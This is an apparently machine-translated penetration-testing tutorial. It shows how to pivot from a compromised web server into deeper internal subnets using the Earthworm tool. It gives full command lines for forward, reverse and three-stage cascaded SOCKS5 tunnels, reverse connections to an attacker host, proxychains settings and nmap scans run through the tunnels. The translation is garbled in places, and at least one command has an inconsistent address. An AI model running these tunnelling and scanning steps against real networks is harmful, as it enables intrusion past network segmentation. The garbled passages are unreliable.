Ew completed using a multi-agency network penetration scene
0x01 demand
When infiltrations into the network, often require agents to flow into the network for further expansion, such as:
- Port Scan
- Port Forwarding
- Access intranet web services
- ……
0x02 Scene
The following simulate a usage scenario.
1, environment configuration, network topology
- A1 - 120.xxx - Kali - public network server attack
- V1 - 10.10.1.111 - Centos - server network, public network without opening the public network IP, for a web application port 80, open to the public network via a Nginx, have now been webshell, 10.10.1 route segments can be reached.
- V2 - 10.10.2.111 - Centos - Intranet server, not open to the public network, routing section 10.10.3 and 10.10.1 can be reached.
- V3 - 10.10.3.111 - Centos - network server, and do not open public network, there is a web application port 8080, paragraph 10.10.2 reachable 10.10.1 segment route is unreachable.
2, the premise description
In a penetration, the operation of the web application on the A1 V1 to penetrate, get the webshell V1 and rebound shell onto the A1. Then intend to do within the network penetration, further resources found within the network.
0x03 operation
Tool to achieve penetration within the network, there are many, such as Earthworm, Termite, reGeorg, nps, the main use of simulated network ew operate here.
EW (Earthworm) is a portable network penetration tool with SOCKS v5 service and set up port forwarding two core functions, network penetration can be completed in a complex network environment.
Can "forward", "reverse", "multi-stage cascade" in order to get through a tunnel network, direct access to the depths of the network, breaking the network restrictions.
There are 6 modes:
- ssocksd - Forward Proxy
- rcsocks - 1 reverse proxy, traffic forwarding
- rssocks - 2 reverse proxy, socks5 rebound
- lcx_listen - 1 reverse proxy, traffic forwarding
- lcx_tran - port forwarding
- lcx_slave - Port Binding
Scene One: the traffic agent to V1, carried out within the network information collection
After obtaining the shell V1, first download ew, ready to set up socks5, proxy local traffic.
Here you can choose between two ways: forward proxy and reverse proxy.
Forward Agent:
Assuming that the target machine V1 with a public IP (139.xxx), can be used the way forward proxy traffic.
Start socks5 service on the target machine V1 and listening port 1080:
./ew -s ssocksd -l 1080
Then flow to the proxy port 139.xxx of 1080, equivalent to proxy traffic to the target machine V1, and you can use the tools for further penetration.
A1 on proxychains proxy configuration:
vi /etc/proxychains.conf
[ProxyList]
socks5 139.x.x.x 1080
Reverse Proxy:
As the scene target V1 no public IP, but can access the public network. V1 because there is no specific address, can not use the forward connection, you can use a proxy connection rebound flow.
In the local start-up current attack aircraft A1 forwarding, external traffic from port 1080 forwarded to local port 8888 and waits for a rebound goal connection:
./ew -s rcsocks -l 1080 -e 8888
Start socks5 service on the target machine V1, and bounced back to the 8888 port of attack aircraft A1:
./ew -s rssocks -d 120.x.x.x -e 8888
Broker channel set up is completed, access to the A1 1080 8888 V1 equivalent access port, use proxychain on the attack machine A1 will flow to the local proxy port 1080, which is equivalent to the traffic agents on the target machine V1, and initiated the request on the A1 fairly to initiate a request on the V1, then you can use the tools for further penetration.
A1 on proxychains proxy configuration:
[ProxyList]
socks5 127.0.0.1 1080
Followed by further been found that the machine V1 segments within each network port on the nmap scanning A1:
proxychains nmap -p xxx
-sT -Pn -open 10.10.1.111/16
Note: Due to proxychains not proxy icmp packets to add ban ping parameters -Pn (does not detect whether the survival of the host, directly tcp port scan)
Scan results can only be found in section 10.2 of arrival machine within the network V2-10.10.2.111, opened 22 ports and other
attempts to infiltrate V2, found to have been set free in the dense login V2 V1, V1 before rebounding shell used ssh successfully logged on to V2.
Scene 2: The traffic agent to V2, for further information gathering
Now been shell V2 and V2 examination revealed unreasonable public network, public network traffic can not reverse proxy, the need for multi-level proxy by V1. Then the agent will flow onto V2 for further probing.
Here, too, there are two ways: forward proxy and reverse proxy.
Forward Agent:
Assuming that the target machine V1 with a public IP (139.xxx), can be used the way forward proxy traffic.
Start socks5 proxy on the target machine V2 and listening port 9999:
./ew -s ssocksd -l 9999
Start traffic forwarding on the V1, the 9999 port binding 1080 port of V1 and V2, the establishment of socks5 channels:
./ew -s lcx_tran -l 1080 -f 10.10.2.111 -g 9999
Then flow to the proxy port 139.xxx of 1080, equivalent to the traffic agents on the target machine V2.
A1 on proxychains proxy configuration:
[ProxyList]
socks5 139.x.x.x 1080
Reverse Proxy:
forwards in the local startup flow attack aircraft A1, external traffic from forward port 1080 to the local port 8888 and waits for a rebound goal connection:
./ew -s lcx_listen -l 1080 -e 8888
Ew transfer to V2, and V2 start socks5 agent listening port 9999:
./ew -s ssocksd -l 9999
The last execution in V1, the 8888 port 9999 port binding with V2 of the A1, the establishment of socks5 channels:
./ew -s lcx_slave -d 120.x.x.x -e 8888 -f 10.10.2.111 -g 9999
Broker channel set up is completed, the access A1 of 1080 is equivalent to 9999 V2 port access, the use of attack aircraft proxychain on A1 traffic agent to a local port 1080, which is equivalent to the traffic agents on the target machine V2, and initiated the request on the A1 fairly to initiate a request on V2.
A1 on proxychains proxy configuration:
[ProxyList]
socks5 127.0.0.1 1080
Then you can use the tools for further penetration here to use nmap port scan on the A1:
proxychains nmap -p xxx -sT -Pn -open 10.10.2.111/16
Scan results can be found to reach 10.3 segment of a machine within the network V3-10.10.3.111, open port 8080.
According to previous scan results on the V1, unable to reach 10.3 10.1 segment, but by V2 springboard, you can have access to the machine within the network and applications deeper.
For A1 browser proxy settings, the proxy to the local port 1080, that traffic agents to V2, so you can access the intranet web applications on V3.
Tries to access the browser http://10.10.3.111 : 8080, found an operation and maintenance management system, then they can penetrate further web, slightly.
Scene Three: Suppose shell V3 has been obtained, the agency will now flow into V3. (Three-stage cascade)
Forward Agent:
Assuming that the target machine V1 with a public IP (139.xxx), can be used the way forward proxy traffic.
Start traffic forwarding on the V1, the 9999 port binding 1080 port of V1 and V2, the establishment of socks5 channels:
./ew -s lcx_tran -l 1080 -f 10.10.2.111 -g 9999
Start traffic forwarding on V2, the 8888 port binding 9999 port of V2 and V3, the establishment of socks5 channels:
./ew -s lcx_tran -l 9999 -f 10.10.3.111 -g 8888
Start socks5 proxy on the target machine V3 and listening on port 8888:
./ew -s ssocksd -l 8888
More than one way: by reverse proxy scenario in two ways, from the V1 → V3 erection can be achieved.
Then flow to the proxy port 139.xxx of 1080, equivalent to the traffic agents on the target machine V3.
A1 on proxychains proxy configuration:
[ProxyList]
socks5 139.x.x.x 1080
Reverse Proxy:
execution in attack aircraft A1, local start traffic forwarding, port forwarding from 8888 external traffic to the local port 1080 and waits for a rebound goal connection:
./ew -s rcsocks -l 1080 -e 8888
In V1 execution, the 9999 port binding with V2's 8888 port A1, the establishment of socks5 channels:
./ew -s lcx_slave -d 120.x.x.x -e 8888 -f 10.10.2.111 -g 9999
In V2 execution, local start traffic forwarding, port forwarding from 7777 external traffic to the local port 9999 and wait for the target machine V3 rebound connection:
./ew -s lcx_listen -l 9999 -e 7777
Target V3 execution, start socks5 service, and bounced back to the 7777 port V2:
./ew -s rssocks -d 10.10.2.111 -e 7777
Broker channel set up is completed, access to the A1 port access V3 1080 is equivalent to 7777, the use of attack aircraft proxychain on A1 traffic agent to a local port 1080, which is equivalent to the traffic agents on the target machine V3, and initiated the request on the A1 fairly to initiate a request on V3.
A1 on proxychains proxy configuration:
[ProxyList]
socks5 127.0.0.1 1080
Port forwarding operations under the three-stage cascade: Four scenes
ew network also supports port forwarding, web application port agent on the target machine V3 now the network to the external network.
Forward Agent:
Assuming that the target machine V1 with a public IP (139.xxx), can be used the way forward proxy traffic.
Start traffic forwarding on the V1, the 9999 port binding 1080 port of V1 and V2, the establishment of socks5 channels:
./ew -s lcx_tran -l 1080 -f 10.10.2.111 -g 9999
Start traffic forwarding on V2, the 8080 port binding 9999 port of V2 and V3, the establishment of socks5 channels:
./ew -s lcx_tran -l 9999 -f 10.10.3.111 -g 8080
Broker channel set up is complete, access the 1080 V1 V3 is equivalent to 8080 port access.
A1 access the browser http://139.xxx : 1080, namely to access the intranet web applications on V3.
Reverse Proxy:
execution in A1, start local traffic forwarding, port forwarding from 8888 external traffic to the local port 1080 and waits for a rebound goal connection:
./ew -s lcx_listen -l 1080 -e 8888
In V1 execution, the 9999 port binding with V2's 8888 port A1, the establishment of socks5 channels:
./ew -s lcx_slave -d 120.x.x.x -e 8888 -f 10.10.2.111 -g 9999
In V2 execution, start traffic forwarding, port binding 8080 9999 Port of V2 and V3, the establishment of socks5 channels:
./ew -s lcx_tran -l 9999 -f 10.3.10.111 -g 8080
Broker channel set up is completed, the access A1 of 1080 is equivalent to 8080 V3 of port access.
A1 access the browser http://127.0.0.1 : 1080, namely to access the intranet web applications on V3.
0x04 summary
Diverse combat scenarios may be more complex and may be relatively simple, not elaborated on, try to cover common type of scenario chapter describes the basic use of four kinds of scenarios under ew.
The contents are based on the use of tools also without too much difficulty, the key is to figure out the actual target within the network data flow, to split large, complex scenes into several small scenes, make the problem easier.
Paper come Zhongjue know this practice is essential, I think more and more practical operation, can only continue to progress.